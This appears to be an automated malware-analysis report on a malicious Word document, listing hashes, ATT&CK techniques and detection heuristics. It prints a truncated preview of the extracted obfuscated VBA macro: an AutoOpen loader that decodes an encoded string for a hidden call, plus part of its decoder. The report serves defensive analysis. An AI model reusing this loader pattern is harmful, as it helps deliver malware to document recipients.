Office (OLE) malware analysis — malicious · b8b5def5ac579f97

MALICIOUS

Office (OLE)

304.5 KB Created: 2018-10-04 16:53:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 079901ea4fabeb415e5b1a458323f860 SHA-1: 07ec281400d23a89003bd3f883046af333da322b SHA-256: b8b5def5ac579f97f4be21dc8f4a4bf908fe597eb802ca1c339b99bbe783655f

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes obfuscated strings and calls to `Shell()` and `CreateObject()` to likely download and execute a second-stage payload. The ClamAV heuristic also flags it as an obfuscated macro document.

Heuristics 8

ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70267 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	70267 bytes
SHA-256: `59637168d9f20eda691d59984ce0d8db5533021be9b8376e3af433e48db900a9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VEBehUuLXWKntkDDq" Sub AutoOpen() Dim qSIUZXegBMPCn As String Dim deQeuRZIfmZ As Integer deQeuRZIfmZ = 1 * 6 qSIUZXegBMPCn = AhDDbigKwsSrbL(jPIFMdtKUVhgqpVv("IDc1O2ltbFM1Ozo7LCZXIidaKjkpLWYkLCR6KDs1JlwjVDosVTk8HCkhXlohMD4sKVReKnclLDg="), "HCAKSBC2PIUVCB2PI3GILUHGCIUGUYO2F3UC2UY3FO23OUYCF32OYUDHOYGU32FVYUO23GF") Dim fFvjIasmoupbewNMoXL As Integer fFvjIasmoupbewNMoXL = 9 * 3 HdMeSqnbfuPuCuGG.OPYHNQONAMvO (qSIUZXegBMPCn) Dim SNPWuqhZXaQXcwrVg As Integer SNPWuqhZXaQXcwrVg = 2 Dim OoBcyZPqAIMbzSMho As Integer OoBcyZPqAIMbzSMho = 7 Dim TqlGTSmBbfCJkIEfTEI As Integer TqlGTSmBbfCJkIEfTEI = 7 Dim tOKSlqLFOcgFpjT As Collection Set tOKSlqLFOcgFpjT = New Collection tOKSlqLFOcgFpjT.Add "XqRaEbdfTqvnPY" tOKSlqLFOcgFpjT.Add "rTaTkkaElFmbk" If TqlGTSmBbfCJkIEfTEI < Len(Application.UserName) Then Dim WZiTObqvUnKgbUB As Integer WZiTObqvUnKgbUB = 3 * 1 Dim xTMpVlvuijBNyDiRVz As Object Dim fryrrqZxRgnyfFo As Integer fryrrqZxRgnyfFo = 4 * 9 TqlGTSmBbfCJkIEfTEI = Len(Application.UserName) End If If OoBcyZPqAIMbzSMho < Len(Application.UserName) Then Dim HgHRerWgtwYCyrIama As Object Dim LrzHeJjfzqH As Integer LrzHeJjfzqH = 8 Dim rmmuIRJaakZeuErVKkS As Collection Set rmmuIRJaakZeuErVKkS = New Collection rmmuIRJaakZeuErVKkS.Add "aClDKoANjvhWN" rmmuIRJaakZeuErVKkS.Add "fkhSyNraYgJHVKUu" rmmuIRJaakZeuErVKkS.Add "xSWiXiljIMaf" rmmuIRJaakZeuErVKkS.Add "vNoBFBlhbDZ" rmmuIRJaakZeuErVKkS.Add "efiQRChFnCIaTuffTmY" rmmuIRJaakZeuErVKkS.Add "etKUndKGvSydGHJu" rmmuIRJaakZeuErVKkS.Add "EupAULfJNoLoaQfMN" rmmuIRJaakZeuErVKkS.Add "IfeRKRMYMRIZDTOG" rmmuIRJaakZeuErVKkS.Add "QfWdiWBWOsTvFZCU" rmmuIRJaakZeuErVKkS.Add "lYIJuMbgEVE" If LrzHeJjfzqH < Len(Application.UserName) Then Dim KFMINWOiQBjCBCKvZqC As Integer KFMINWOiQBjCBCKvZqC = 4 * 4 Dim eSvPTimLMfMBClGfbU As Object Dim SaCntVupewTzJIcw As Integer SaCntVupewTzJIcw = 9 * 9 LrzHeJjfzqH = Len(Application.UserName) End If OoBcyZPqAIMbzSMho = Len(Application.UserName) End If If SNPWuqhZXaQXcwrVg < Len(Application.UserName) Then Dim iXkBcHznBBOGFA As Integer iXkBcHznBBOGFA = 3 * 9 Dim LmvPoXVTRjeMovflcv As Object Dim FwRYOEIbhNPTU As Integer FwRYOEIbhNPTU = 3 * 9 SNPWuqhZXaQXcwrVg = Len(Application.UserName) End If ' OPTIONS Dim qDIvslNHWQdcJKOhtY As Integer qDIvslNHWQdcJKOhtY = 4 * 4 End Sub Public Function jPIFMdtKUVhgqpVv(VGZowPzNbINHAV As String, Optional PLSHqwSdvjWEYF As Boolean = True) As String Static RYXkcACuHNgNS(0 To 255) As Byte Dim nztASlfVYbuSYEO As Collection Set nztASlfVYbuSYEO = New Collection nztASlfVYbuSYEO.Add "LjfwkEqBNcYu" nztASlfVYbuSYEO.Add "xGXDnuEmblqyPYfJiIm" Dim FdtgesasZuGs() As Byte, CKYacBGGVINCoCBI() As Byte Dim tMdhxqdtJvCsAnzuU As Integer tMdhxqdtJvCsAnzuU = 3 * 1 Dim HtvtVfdqfaYTfqrjk As Long, JEUTxgjwAjlWU As Long Dim nEafHgpgBFqR As Integer nEafHgpgBFqR = 6 Dim DIiWHdNTpFIgivSgaS As Integer DIiWHdNTpFIgivSgaS = 4 * 6 If nEafHgpgBFqR < Len(Application.UserName) Then Dim LxpsNvXNDNrplIVHHRY As Integer LxpsNvXNDNrplIVHHRY = 5 * 5 Dim iZeifLxrnbYgFFOFS As Object Dim jmGBjTIlDec As Integer jmGBjTIlDec = 8 * 4 nEafHgpgBFqR = Len(Application.UserName) End If If RYXkcACuHNgNS(0) = 0 Then Dim NwirXRsLeaGsZllEB As Integer NwirXRsLeaGsZllEB = 6 * 9 For HtvtVfdqfaYTfqrjk = 0 To 255 Dim YKXhJSnTBDzEwkt As Integer YKXhJSnTBDzEwkt = 4 * 7 RYXkcACuHNgNS(HtvtVfdqfaYTfqrjk) = 255 Dim cMmktmOmPnYZLEecope As Integer cMmktmOmPnYZLEecope = 8 * 4 Next HtvtVfdqfaYTfqrjk Dim RIbUXzxdaReBqevNA As Integer RIbUXzxdaReBqevNA = 3 * 6 For HtvtVfdqfaYTfqrjk = 0 To 25 Dim BhVDYUdinQMJRwDap As Collection Set BhVDYUdinQMJRwDap = New Collection BhVDYUdinQMJRwDap.Add "uZjJDKQxSTsJ" BhVDYUdinQMJRwDap.Add "eHLURCUcgEPhwgJ" BhVDYUdinQMJRwDap.Add "iWKewzvfQzQcO" BhVDYUdinQMJRwDap.Add "zTYiyvicqhLmCMTpyb" BhVDYUdi ... (truncated)

SHA-256: 59637168d9f20eda691d59984ce0d8db5533021be9b8376e3af433e48db900a9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VEBehUuLXWKntkDDq"
Sub AutoOpen()
Dim qSIUZXegBMPCn As String
Dim deQeuRZIfmZ As Integer
deQeuRZIfmZ = 1 * 6
qSIUZXegBMPCn = AhDDbigKwsSrbL(jPIFMdtKUVhgqpVv("IDc1O2ltbFM1Ozo7LCZXIidaKjkpLWYkLCR6KDs1JlwjVDosVTk8HCkhXlohMD4sKVReKnclLDg="), "HCAKSBC2PIUVCB2PI3GILUHGCIUGUYO2F3UC2UY3FO23OUYCF32OYUDHOYGU32FVYUO23GF")
Dim fFvjIasmoupbewNMoXL As Integer
fFvjIasmoupbewNMoXL = 9 * 3
HdMeSqnbfuPuCuGG.OPYHNQONAMvO (qSIUZXegBMPCn)
Dim SNPWuqhZXaQXcwrVg As Integer
SNPWuqhZXaQXcwrVg = 2
Dim OoBcyZPqAIMbzSMho As Integer
OoBcyZPqAIMbzSMho = 7
Dim TqlGTSmBbfCJkIEfTEI As Integer
TqlGTSmBbfCJkIEfTEI = 7
Dim tOKSlqLFOcgFpjT As Collection
Set tOKSlqLFOcgFpjT = New Collection
tOKSlqLFOcgFpjT.Add "XqRaEbdfTqvnPY"
tOKSlqLFOcgFpjT.Add "rTaTkkaElFmbk"
If TqlGTSmBbfCJkIEfTEI < Len(Application.UserName) Then
Dim WZiTObqvUnKgbUB As Integer
WZiTObqvUnKgbUB = 3 * 1
Dim xTMpVlvuijBNyDiRVz As Object
Dim fryrrqZxRgnyfFo As Integer
fryrrqZxRgnyfFo = 4 * 9
TqlGTSmBbfCJkIEfTEI = Len(Application.UserName)
End If
If OoBcyZPqAIMbzSMho < Len(Application.UserName) Then
Dim HgHRerWgtwYCyrIama As Object
Dim LrzHeJjfzqH As Integer
LrzHeJjfzqH = 8
Dim rmmuIRJaakZeuErVKkS As Collection
Set rmmuIRJaakZeuErVKkS = New Collection
rmmuIRJaakZeuErVKkS.Add "aClDKoANjvhWN"
rmmuIRJaakZeuErVKkS.Add "fkhSyNraYgJHVKUu"
rmmuIRJaakZeuErVKkS.Add "xSWiXiljIMaf"
rmmuIRJaakZeuErVKkS.Add "vNoBFBlhbDZ"
rmmuIRJaakZeuErVKkS.Add "efiQRChFnCIaTuffTmY"
rmmuIRJaakZeuErVKkS.Add "etKUndKGvSydGHJu"
rmmuIRJaakZeuErVKkS.Add "EupAULfJNoLoaQfMN"
rmmuIRJaakZeuErVKkS.Add "IfeRKRMYMRIZDTOG"
rmmuIRJaakZeuErVKkS.Add "QfWdiWBWOsTvFZCU"
rmmuIRJaakZeuErVKkS.Add "lYIJuMbgEVE"
If LrzHeJjfzqH < Len(Application.UserName) Then
Dim KFMINWOiQBjCBCKvZqC As Integer
KFMINWOiQBjCBCKvZqC = 4 * 4
Dim eSvPTimLMfMBClGfbU As Object
Dim SaCntVupewTzJIcw As Integer
SaCntVupewTzJIcw = 9 * 9
LrzHeJjfzqH = Len(Application.UserName)
End If
OoBcyZPqAIMbzSMho = Len(Application.UserName)
End If
If SNPWuqhZXaQXcwrVg < Len(Application.UserName) Then
Dim iXkBcHznBBOGFA As Integer
iXkBcHznBBOGFA = 3 * 9
Dim LmvPoXVTRjeMovflcv As Object
Dim FwRYOEIbhNPTU As Integer
FwRYOEIbhNPTU = 3 * 9
SNPWuqhZXaQXcwrVg = Len(Application.UserName)
End If
' OPTIONS
Dim qDIvslNHWQdcJKOhtY As Integer
qDIvslNHWQdcJKOhtY = 4 * 4
End Sub
Public Function jPIFMdtKUVhgqpVv(VGZowPzNbINHAV As String, Optional PLSHqwSdvjWEYF As Boolean = True) As String
Static RYXkcACuHNgNS(0 To 255) As Byte
Dim nztASlfVYbuSYEO As Collection
Set nztASlfVYbuSYEO = New Collection
nztASlfVYbuSYEO.Add "LjfwkEqBNcYu"
nztASlfVYbuSYEO.Add "xGXDnuEmblqyPYfJiIm"
Dim FdtgesasZuGs() As Byte, CKYacBGGVINCoCBI() As Byte
Dim tMdhxqdtJvCsAnzuU As Integer
tMdhxqdtJvCsAnzuU = 3 * 1
Dim HtvtVfdqfaYTfqrjk As Long, JEUTxgjwAjlWU As Long
Dim nEafHgpgBFqR As Integer
nEafHgpgBFqR = 6
Dim DIiWHdNTpFIgivSgaS As Integer
DIiWHdNTpFIgivSgaS = 4 * 6
If nEafHgpgBFqR < Len(Application.UserName) Then
Dim LxpsNvXNDNrplIVHHRY As Integer
LxpsNvXNDNrplIVHHRY = 5 * 5
Dim iZeifLxrnbYgFFOFS As Object
Dim jmGBjTIlDec As Integer
jmGBjTIlDec = 8 * 4
nEafHgpgBFqR = Len(Application.UserName)
End If
If RYXkcACuHNgNS(0) = 0 Then
Dim NwirXRsLeaGsZllEB As Integer
NwirXRsLeaGsZllEB = 6 * 9
For HtvtVfdqfaYTfqrjk = 0 To 255
Dim YKXhJSnTBDzEwkt As Integer
YKXhJSnTBDzEwkt = 4 * 7
RYXkcACuHNgNS(HtvtVfdqfaYTfqrjk) = 255
Dim cMmktmOmPnYZLEecope As Integer
cMmktmOmPnYZLEecope = 8 * 4
Next HtvtVfdqfaYTfqrjk
Dim RIbUXzxdaReBqevNA As Integer
RIbUXzxdaReBqevNA = 3 * 6
For HtvtVfdqfaYTfqrjk = 0 To 25
Dim BhVDYUdinQMJRwDap As Collection
Set BhVDYUdinQMJRwDap = New Collection
BhVDYUdinQMJRwDap.Add "uZjJDKQxSTsJ"
BhVDYUdinQMJRwDap.Add "eHLURCUcgEPhwgJ"
BhVDYUdinQMJRwDap.Add "iWKewzvfQzQcO"
BhVDYUdinQMJRwDap.Add "zTYiyvicqhLmCMTpyb"
BhVDYUdi
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.